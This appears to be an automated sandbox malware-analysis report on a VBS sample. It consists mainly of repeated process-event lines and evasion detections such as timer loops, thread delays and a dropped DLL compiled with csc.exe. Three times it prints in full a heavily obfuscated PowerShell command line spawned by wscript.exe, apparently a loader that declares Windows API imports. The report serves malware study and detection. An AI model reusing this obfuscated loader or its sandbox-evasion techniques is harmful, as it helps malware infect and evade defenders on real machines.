Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

Malware Analysis System Evasion

barindex
Potential evasive VBS script found (use of timer() function in loop)
Source: Initial fileInitial file: do while timer-temp<sec
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1668Thread sleep time: -7378697629483816s >= -30000sJump to behavior
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\jadyuuoq\jadyuuoq.dllJump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 8782Jump to behavior
Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: powershell.exe, 00000003.00000002.833621098.0000000005416000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V
Source: powershell.exe, 00000003.00000002.827196045.0000000004F35000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ,l:C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Hyper-V-c
Source: powershell.exe, 00000003.00000002.833621098.0000000005416000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ,l:C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Hyper-V
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" "$biliate = """laabrdgedga-sttdiycopsteun st-udthoyaupepewrdreetrfpaiusnumiretcoimaofrnsv sm'reusksunifuncogkn tosphyprsjatnuesimst;viusmsprisknangim prsplyeusgrtgueoemfo.rerpuuconhutsoifrmfreil.joifonsntsnelurcoopapjastrererelvkuiticreefesbr;ampupukobsnlvoidecaw sasrutrhajetaaitecsv brceslfoaunsvasle ebtinubaebaiourceokonpr1ci sh{ti[phdaflullbuimimhapmaoafreutan(ad`"""inuluskiekarme3br2si`"""rr)ri]gopmauflbstlmeitycsa aeskatinahjtsmisvcne stehoxattimeteropnna gribenbrtno yddmierestotenrbrostyovcspamermiecotkl(sn)me;sm[afdepllulreienmflprdoharegtbr(ov`"""migaldmeipl3in2er`"""te)ce]tapeuudrbculmaihjcas lgsudttrabrtsqiercco viebextetveetrrhrnma foibanartha stsbrcudagrllaeskwteiscnsudreobuwcrevexchtstesuxkn(noifinkutse modlnrigibefratpl,reiannaltju beaudmambmiupalheaap,diifonkntsp jubprasesvaoqu,mailenimtba noiafadagvrtpotsyaov,chigenpltre divsaetvjsimboasotan1un5fr8ud,giitinstter yemsucslgkursk)eg;ak[kuddilbulimirdmampanovarprtfr(sk`"""svksqerorpinflerelpa3ov2as`"""tr)wo]hepmeurobbalfrilucre hysmitfoaunttaitmcja anedexmitkuesarblnoi reifansutov drhdeestabapblsbeispzbaeko(stiunnditou ycpkerbrourpre,phisonxatcl aianodstrchefosov,viidenjutdi mutimowerartinrfripo)mo;co[sldoplsalspiapmunpreosjrrotko(wh`"""jgsschdiebilshlko3ge2re.vaduflomlun`"""st)un]beppauslboslbeiuncas masmntsyaletfritrcpr noevixratfoererwenun sevenofuitrdrh padterflafigmefciiennstikasbehmi(esibonsutpo opomumpldserge)ba;ej[spdfalbelmeilimhepfroudrgutau(je`"""mawskifantemnumin.apdkolbolfl`"""fu)ho]scpovuprbmdlviialcba bossatasahotliifocsi veenoxluthaebirjenla hoiennnatgu armtjihoxscedartrgswejotcodtrefivsuckeamipqussu(skiblncitch benpribrtserud,uditincotjo vafaseewlob,thivinquteo noaphfafsxi9im3bl)ta;ls[chdculcalhaipumcipicofarretsl(be`"""rekgletrrhinatesilek3sa2ur`"""ti)de]papfeudrbfolopilkctn busabtsyaudtmeisocfr coeimxfatmoefrrnanto trimentotal kaludoescaskqurosepasphoovuforjucapeph(roiafncotte velexesoiun)ir;un[redpiliwloyilammipshostrfatcr(bo`"""flkauecervantoejelav3pl2re`"""se)co]unpanucoboplfoilacla casrotopauntmuikacti wieknxentreeudrtrntr ariponintsl pivinistrpetrauacatilvaatelbelclothcfa(tristnsotwi gevgr1sk,smilunthtor cavbl2ne,keistncotby hevdr3pa,heiganuptku svvca4in)pr;py[drdmalinlpribrmhepploknrpttba(ho`"""craundbevalatopanicr3st2ph.wadbelsalci`"""to)un]stptiurebsylpuiencfo cosmotunaunthuiatcst meemixdotofeadrinnro suvbeoupividti cimtrabipbegateoensleglrpribrccomfiaunsankvn(saisknmetpe plbinrtriodnobkir,doidenqutru camchiuddtitknssn)in;ov[trdrelselfuiunmripgoosuromtsc(ve`"""brkvaemermanpeesklst3co2in`"""ef)ce]bepkoumybkollbicocun edsgatkuatetkoiaaclu noevexprtneeunranncy prisenlvtplpfotborkr scegansuumemfuschyfrspotbeeoomfjlguoflcsranelgaevosprwun(paudiieynsttpe grvex1ma,psihankoten kovgr2ha)et;om[oodrhldilflisumenpskoovrtrtsp(st`"""obkedeelrrentaedaldi3sc2di`"""si)ni]fopchutlbdalcaialcli smsnytvaaretprisuctr luebexgattregermanbr reigunentan unsgieunttiten
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" "$biliate = """laabrdgedga-sttdiycopsteun st-udthoyaupepewrdreetrfpaiusnumiretcoimaofrnsv sm'reusksunifuncogkn tosphyprsjatnuesimst;viusmsprisknangim prsplyeusgrtgueoemfo.rerpuuconhutsoifrmfreil.joifonsntsnelurcoopapjastrererelvkuiticreefesbr;ampupukobsnlvoidecaw sasrutrhajetaaitecsv brceslfoaunsvasle ebtinubaebaiourceokonpr1ci sh{ti[phdaflullbuimimhapmaoafreutan(ad`"""inuluskiekarme3br2si`"""rr)ri]gopmauflbstlmeitycsa aeskatinahjtsmisvcne stehoxattimeteropnna gribenbrtno yddmierestotenrbrostyovcspamermiecotkl(sn)me;sm[afdepllulreienmflprdoharegtbr(ov`"""migaldmeipl3in2er`"""te)ce]tapeuudrbculmaihjcas lgsudttrabrtsqiercco viebextetveetrrhrnma foibanartha stsbrcudagrllaeskwteiscnsudreobuwcrevexchtstesuxkn(noifinkutse modlnrigibefratpl,reiannaltju beaudmambmiupalheaap,diifonkntsp jubprasesvaoqu,mailenimtba noiafadagvrtpotsyaov,chigenpltre divsaetvjsimboasotan1un5fr8ud,giitinstter yemsucslgkursk)eg;ak[kuddilbulimirdmampanovarprtfr(sk`"""svksqerorpinflerelpa3ov2as`"""tr)wo]hepmeurobbalfrilucre hysmitfoaunttaitmcja anedexmitkuesarblnoi reifansutov drhdeestabapblsbeispzbaeko(stiunnditou ycpkerbrourpre,phisonxatcl aianodstrchefosov,viidenjutdi mutimowerartinrfripo)mo;co[sldoplsalspiapmunpreosjrrotko(wh`"""jgsschdiebilshlko3ge2re.vaduflomlun`"""st)un]beppauslboslbeiuncas masmntsyaletfritrcpr noevixratfoererwenun sevenofuitrdrh padterflafigmefciiennstikasbehmi(esibonsutpo opomumpldserge)ba;ej[spdfalbelmeilimhepfroudrgutau(je`"""mawskifantemnumin.apdkolbolfl`"""fu)ho]scpovuprbmdlviialcba bossatasahotliifocsi veenoxluthaebirjenla hoiennnatgu armtjihoxscedartrgswejotcodtrefivsuckeamipqussu(skiblncitch benpribrtserud,uditincotjo vafaseewlob,thivinquteo noaphfafsxi9im3bl)ta;ls[chdculcalhaipumcipicofarretsl(be`"""rekgletrrhinatesilek3sa2ur`"""ti)de]papfeudrbfolopilkctn busabtsyaudtmeisocfr coeimxfatmoefrrnanto trimentotal kaludoescaskqurosepasphoovuforjucapeph(roiafncotte velexesoiun)ir;un[redpiliwloyilammipshostrfatcr(bo`"""flkauecervantoejelav3pl2re`"""se)co]unpanucoboplfoilacla casrotopauntmuikacti wieknxentreeudrtrntr ariponintsl pivinistrpetrauacatilvaatelbelclothcfa(tristnsotwi gevgr1sk,smilunthtor cavbl2ne,keistncotby hevdr3pa,heiganuptku svvca4in)pr;py[drdmalinlpribrmhepploknrpttba(ho`"""craundbevalatopanicr3st2ph.wadbelsalci`"""to)un]stptiurebsylpuiencfo cosmotunaunthuiatcst meemixdotofeadrinnro suvbeoupividti cimtrabipbegateoensleglrpribrccomfiaunsankvn(saisknmetpe plbinrtriodnobkir,doidenqutru camchiuddtitknssn)in;ov[trdrelselfuiunmripgoosuromtsc(ve`"""brkvaemermanpeesklst3co2in`"""ef)ce]bepkoumybkollbicocun edsgatkuatetkoiaaclu noevexprtneeunranncy prisenlvtplpfotborkr scegansuumemfuschyfrspotbeeoomfjlguoflcsranelgaevosprwun(paudiieynsttpe grvex1ma,psihankoten kovgr2ha)et;om[oodrhldilflisumenpskoovrtrtsp(st`"""obkedeelrrentaedaldi3sc2di`"""si)ni]fopchutlbdalcaialcli smsnytvaaretprisuctr luebexgattregermanbr reigunentan unsgieunttitenJump to behavior
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe CMD.EXE /c echo C:\WindowsJump to behavior
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Biliate = """LaABrdGedGa-StTDiyCopsteUn St-UdThoyAupepeWrDReeTrfPaiUsnUmiRetCoiMaoFrnSv Sm'ReuSksUniFunCogKn ToSPhyPrsJatNueSimst;viuSmsPriSknangIm PrSPlyEusGrtgueoemFo.ReRPuuConHutSoiFrmFreIl.JoIFonSntSneLurCooPapJaSTreRerElvKuiticReeFesBr;AmpUpuKobsnlVoiDecAw sasRutRhajetaaiTecSv BrcEslFoaUnsVasLe EbTInuBaeBaiOurCeoKonPr1Ci Sh{Ti[PhDAflUllBuIMimHapMaoAfrEutAn(ad`"""InuLusKieKarMe3Br2Si`"""Rr)Ri]GopMauFlbStlMeiTycSa AesKatInaHjtSmiSvcNe SteHoxattImeTerOpnNa GriBenBrtNo YdDMieResTotEnrBroStyOvCspaMerMieCotKl(sn)Me;Sm[AfDEplLulReIenmFlpRdoHarEgtBr(Ov`"""MigAldMeiPl3In2Er`"""Te)Ce]tapEuuDrbCulMaiHjcAs LgsUdtTraBrtSqiercCo VieBexTetVeetrrHrnMa FoiBanArtHa StSBrcUdaGrlLaeSkWTeiScnSudReoBuwCrEVexChtstESuxKn(NoiFinKutSe MoDLnrIgiBefRatPl,ReiAnnAltJu BeAUdmAmbMiuPalHeaAp,DiiFonKntSp juBpraSesVaoQu,MaiLenImtBa NoiAfaDagVrtPotSyaOv,ChiGenpltRe diVSaeTvjSimboaSotAn1Un5Fr8Ud,GiiTinSttEr YeMSucSlgKurSk)Eg;Ak[KuDDilBulImIRdmAmpAnoVarPrtFr(Sk`"""SvkSqeRorpinFleRelPa3Ov2as`"""Tr)Wo]hepMeuRobBalFriLucRe HysMitFoaUntTaiTmcJa aneDexMitKueSarBlnOi ReiFanSutov drHDeeStaBapBlSBeiSpzBaeKo(StiUnnDitOu YcPKerBroUrpRe,PhiSonxatCl AiANodStrCheFosOv,ViiDenJutDi MuTImoWerArtInrfriPo)Mo;Co[SlDOplSalSpIApmunpReoSjrRotKo(wh`"""JgsSchdieBilShlko3Ge2re.VadUflOmlUn`"""St)Un]BepPauSlbOslBeiUncAs MasMntSyaLetFriTrcpr NoeVixRatFoeRerWenun SevEnofuiTrdRh PaDterFlaFigMeFCiiEnnStiKasBehMi(EsiBonSutPo OpOMumPldSerGe)Ba;Ej[SpDFalBelMeILimhepFroUdrGutAu(Je`"""mawSkifanTemNumIn.ApdKolBolFl`"""Fu)Ho]ScpOvuPrbMdlViiAlcBa BosSatAsaHotLiiFocSi VeeNoxLutHaeBirJenLa HoiennNatGu ArmtjiHoxSceDarTrGSwejotCoDTreFivSuCKeaMipqusSu(SkiBlnCitCh BeNPriBrtSerUd,UditinCotJo VaFaseEwlOb,ThivinQutEo NoAPhfAfsXi9Im3Bl)Ta;Ls[ChDCulCalHaIPumCipIcoFarRetSl(Be`"""RekGleTrrhinAteSilEk3Sa2ur`"""Ti)De]PapFeuDrbFolOpiLkcTn BusAbtSyaUdtMeiSocfr CoeImxFatMoeFrrnanto triMenTotAl KaLUdoEscAskQuRosepasphoOvuForJucApeph(RoiAfnCotTe VeLExeSoiUn)Ir;Un[ReDPilIwlOyILammipShoStrFatCr(Bo`"""FlkAueCervanToeJelAv3Pl2Re`"""Se)Co]UnpAnuCobOplFoilacLa CasrotOpaUntMuiKacTi WieKnxEntReeUdrTrnTr AriPonIntSl PiVIniStrpetrauAcaTilvaATelBelCloThcFa(TriStnSotWi GevGr1Sk,SmiLunThtOr CavBl2Ne,KeiStnCotBy Hevdr3pa,HeiGanUptku SvvCa4In)pr;Py[DrDMalInlPrIBrmHepPloKnrPttba(Ho`"""CrAUnDBeVAlAToPanICr3St2Ph.WaDBeLSaLCi`"""To)Un]StpTiuRebSylPuiEncFo CosMotUnaUntHuiAtcst MeeMixDotOfeAdrInnRo SuvBeoUpiVidTi CiMTraBipBeGAteOenSleGlrPriBrcCoMFiaUnsAnkVn(SaiSknMetPe PlBInrTriOdnObkIr,DoiDenQutRu CaMChiUddtitKnsSn)In;Ov[TrDRelSelFuIUnmRipGoosurOmtSc(Ve`"""BrkVaeMerManPeeSklSt3Co2In`"""ef)Ce]BepKouMybKolLbiCocUn EdsGatKuaTetKoiaacLu NoeVexPrtNeeUnrAnnCy PrISenLvtPlPFotBorkr ScEGanSuumemfuSChyFrsPotBeeOomFjLGuoFlcSraNelGaeVosPrWUn(PauDiiEynSttPe GrvEx1ma,PsiHanKotEn KovGr2Ha)Et;Om[OoDrhlDilFlIsumEnpSkoOvrTrtSp(St`"""ObkEdeElrRenTaeDalDi3Sc2Di`"""Si)Ni]FopChuTlbDalCaiAlcLi SmsNytvaaretPriSucTr LueBexGatTreGerManbr ReiGunentAn UnSGieUntTiTEnJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\jadyuuoq\jadyuuoq.cmdlineJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES8B47.tmp" "c:\Users\user\AppData\Local\Temp\jadyuuoq\CSC891590C19254105A6A792E8745AF5FD.TMP"Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
